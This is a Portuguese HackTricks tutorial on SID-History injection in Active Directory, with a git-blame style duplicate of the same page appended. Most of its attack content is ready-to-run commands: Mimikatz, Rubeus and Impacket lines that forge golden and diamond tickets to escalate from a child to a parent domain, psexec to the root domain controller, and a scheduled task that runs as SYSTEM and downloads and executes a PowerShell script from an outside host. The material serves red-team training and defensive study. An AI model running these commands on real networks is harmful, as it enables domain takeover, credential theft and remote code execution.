hacktricks/windows-hardening/active-directory-methodology/sid-history-injection.md

# Injeção de SID-History

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}

## Ataque de Injeção de SID History

O foco do **Ataque de Injeção de SID History** é auxiliar **na migração de usuários entre domínios** enquanto garante o acesso contínuo a recursos do domínio anterior. Isso é realizado **incorporando o Identificador de Segurança (SID) anterior do usuário ao SID History** de sua nova conta. Notavelmente, esse processo pode ser manipulado para conceder acesso não autorizado ao adicionar o SID de um grupo de alto privilégio (como Administradores de Empresa ou Administradores de Domínio) do domínio pai ao SID History. Essa exploração confere acesso a todos os recursos dentro do domínio pai.

Existem dois métodos para executar esse ataque: através da criação de um **Golden Ticket** ou um **Diamond Ticket**.

Para identificar o SID do grupo **"Administradores de Empresa"**, deve-se primeiro localizar o SID do domínio raiz. Após a identificação, o SID do grupo Administradores de Empresa pode ser construído anexando `-519` ao SID do domínio raiz. Por exemplo, se o SID do domínio raiz for `S-1-5-21-280534878-1496970234-700767426`, o SID resultante para o grupo "Administradores de Empresa" seria `S-1-5-21-280534878-1496970234-700767426-519`.

Você também pode usar os grupos **Administradores de Domínio**, que terminam em **512**.

Outra maneira de encontrar o SID de um grupo do outro domínio (por exemplo, "Administradores de Domínio") é com:
```powershell
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
```
### Golden Ticket (Mimikatz) com KRBTGT-AES256

{% code overflow="wrap" %}
```bash
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"

/user is the username to impersonate (could be anything)
/domain is the current domain.
/sid is the current domain SID.
/sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account.
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
/startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed.

# The previous command will generate a file called ticket.kirbi
# Just loading you can perform a dcsync attack agains the domain
```
{% endcode %}

Para mais informações sobre golden tickets, consulte:

{% content-ref url="golden-ticket.md" %}
[golden-ticket.md](golden-ticket.md)
{% endcontent-ref %}

### Diamond Ticket (Rubeus + KRBTGT-AES256)

{% code overflow="wrap" %}
```powershell
# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap

# Or a ptt with a golden ticket
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid>  /sids:<parent_domain_sid>-519 /user:Administrator /ptt

# You can use "Administrator" as username or any other string
```
{% endcode %}

Para mais informações sobre diamond tickets, consulte:

{% content-ref url="diamond-ticket.md" %}
[diamond-ticket.md](diamond-ticket.md)
{% endcontent-ref %}

{% code overflow="wrap" %}
```bash
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
```
{% endcode %}

Escalar para DA de root ou administrador da empresa usando o hash KRBTGT do domínio comprometido:

{% code overflow="wrap" %}
```bash
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local

schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"

schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
```
{% endcode %}

Com as permissões adquiridas do ataque, você pode executar, por exemplo, um ataque DCSync no novo domínio:

{% content-ref url="dcsync.md" %}
[dcsync.md](dcsync.md)
{% endcontent-ref %}

### Do linux

#### Manual com [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)

{% code overflow="wrap" %}
```bash
# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"

# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator

# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS

# Load ticket
export KRB5CCNAME=hacker.ccache

# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
```
{% endcode %}

#### Automático usando [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)

Este é um script do Impacket que **automatiza a escalada do domínio filho para o domínio pai**. O script precisa de:

* Controlador de domínio de destino
* Credenciais de um usuário administrador no domínio filho

O fluxo é:

* Obtém o SID do grupo Enterprise Admins do domínio pai
* Recupera o hash da conta KRBTGT no domínio filho
* Cria um Golden Ticket
* Faz login no domínio pai
* Recupera as credenciais da conta Administrator no domínio pai
* Se o switch `target-exec` for especificado, autentica-se no Controlador de Domínio do domínio pai via Psexec.
```bash
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
```
## Referências
* [https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)
* [https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/](https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/)

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`# Injeção de SID-History`

			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`<details>`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`<summary>Support HackTricks</summary>`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% endhint %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`## Ataque de Injeção de SID History`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			O foco do Ataque de Injeção de SID History é auxiliar na migração de usuários entre domínios enquanto garante o acesso contínuo a recursos do domínio anterior. Isso é realizado incorporando o Identificador de Segurança (SID) anterior do usuário ao SID History de sua nova conta. Notavelmente, esse processo pode ser manipulado para conceder acesso não autorizado ao adicionar o SID de um grupo de alto privilégio (como Administradores de Empresa ou Administradores de Domínio) do domínio pai ao SID History. Essa exploração confere acesso a todos os recursos dentro do domínio pai.
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Existem dois métodos para executar esse ataque: através da criação de um Golden Ticket ou um Diamond Ticket.`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			Para identificar o SID do grupo "Administradores de Empresa", deve-se primeiro localizar o SID do domínio raiz. Após a identificação, o SID do grupo Administradores de Empresa pode ser construído anexando `-519` ao SID do domínio raiz. Por exemplo, se o SID do domínio raiz for `S-1-5-21-280534878-1496970234-700767426`, o SID resultante para o grupo "Administradores de Empresa" seria `S-1-5-21-280534878-1496970234-700767426-519`.
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Você também pode usar os grupos Administradores de Domínio, que terminam em 512.`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			`Outra maneira de encontrar o SID de um grupo do outro domínio (por exemplo, "Administradores de Domínio") é com:`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```powershell
			`Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`### Golden Ticket (Mimikatz) com KRBTGT-AES256`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00			```bash
			`mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"`

GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`/user is the username to impersonate (could be anything)`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00			`/domain is the current domain.`
			`/sid is the current domain SID.`
			`/sids is the SID of the target group to add ourselves to.`
			`/aes256 is the AES256 key of the current domain's krbtgt account.`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00			`/startoffset sets the start time of the ticket to 10 mins before the current time.`
			`/endin sets the expiry date for the ticket to 60 mins.`
			`/renewmax sets how long the ticket can be valid for if renewed.`

			`# The previous command will generate a file called ticket.kirbi`
			`# Just loading you can perform a dcsync attack agains the domain`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`{% endcode %}`

			`Para mais informações sobre golden tickets, consulte:`

			`{% content-ref url="golden-ticket.md" %}`
			`[golden-ticket.md](golden-ticket.md)`
			`{% endcontent-ref %}`

			`### Diamond Ticket (Rubeus + KRBTGT-AES256)`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```powershell
			`# Use the /sids param`
			`Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`# Or a ptt with a golden ticket`
			`Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt`

			`# You can use "Administrator" as username or any other string`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% endcode %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Para mais informações sobre diamond tickets, consulte:`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`{% content-ref url="diamond-ticket.md" %}`
			`[diamond-ticket.md](diamond-ticket.md)`
			`{% endcontent-ref %}`

GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```bash
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi`
			`ls \\mcorp-dc.moneycorp.local\c$`
			```
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			`{% endcode %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Escalar para DA de root ou administrador da empresa usando o hash KRBTGT do domínio comprometido:`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```bash
			`Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"`
			```
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% endcode %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Com as permissões adquiridas do ataque, você pode executar, por exemplo, um ataque DCSync no novo domínio:`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`{% content-ref url="dcsync.md" %}`
			`[dcsync.md](dcsync.md)`
			`{% endcontent-ref %}`

Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R 2024-02-09 02:10:17 +00:00			`### Do linux`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`#### Manual com [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`{% code overflow="wrap" %}`
			```bash
			`# This is for an attack from child to root domain`
			`# Get child domain SID`
			`lookupsid.py <child_domain>/username@10.10.10.10 \| grep "Domain SID"`
			`# Get root domain SID`
			`lookupsid.py <child_domain>/username@10.10.10.10 \| grep -B20 "Enterprise Admins" \| grep "Domain SID"`

			`# Generate golden ticket`
			`ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator`

			`# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING`
			`# JUST USE THE SAME USERNAME IN THE NEXT STEPS`

			`# Load ticket`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`export KRB5CCNAME=hacker.ccache`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`# psexec in domain controller of root`
			`psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10`
			```
			`{% endcode %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`#### Automático usando [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Este é um script do Impacket que automatiza a escalada do domínio filho para o domínio pai. O script precisa de:`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Controlador de domínio de destino`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Credenciais de um usuário administrador no domínio filho`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`O fluxo é:`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Obtém o SID do grupo Enterprise Admins do domínio pai`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Recupera o hash da conta KRBTGT no domínio filho`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Cria um Golden Ticket`
			`* Faz login no domínio pai`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Recupera as credenciais da conta Administrator no domínio pai`
			* Se o switch `target-exec` for especificado, autentica-se no Controlador de Domínio do domínio pai via Psexec.
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			```bash
			`raiseChild.py -target-exec 10.10.10.10 <child_domain>/username`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Referências`
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			`* [https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)`
			`* [https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/](https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/)`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

GitBook: [#3555] No subject 2022-10-04 14:21:27 +00:00			`<details>`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`<summary>Support HackTricks</summary>`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% endhint %}`